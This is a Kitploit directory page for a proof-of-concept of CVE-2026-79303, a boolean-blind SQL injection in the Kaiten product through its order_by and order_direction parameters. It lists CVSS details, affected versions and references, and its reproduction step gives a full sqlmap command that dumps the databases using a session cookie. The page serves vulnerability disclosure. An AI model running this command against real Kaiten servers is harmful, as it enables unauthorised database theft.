Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-79303 — Proof-of-concept for CVE-2026-79303, a critical boolean-blind SQL injection in Kaiten affecting order_by and order_direction parameters, with reproduction steps and CVSS 9.9 details. | Kitploit
Tools/GitHubGitHub/4ybrick/cve-2026-79303
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

Proof-of-concept for CVE-2026-79303, a critical boolean-blind SQL injection in Kaiten affecting order_by and order_direction parameters, with reproduction steps and CVSS 9.9 details.

View Repository
17h 35m agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-79303

Boolean-blind SQL injection

Description: Dynamic SQL statements are generated without the required data validation and without using parameterized statements or stored procedures.

Impact: SQLi

CVSSv3.1 vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Critical)

CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Affected Component: GET parameters order_by & order_direction

Vendor: kaiten

Affected Product

  • kaiten versions: 57.192.20 < 57.214.26

Steps to reproduce:

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. Type n (no merge your cookie with new one) -> C
Уязвимый параметр

Discoverer

  • Danil Belov

References

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
Download Tool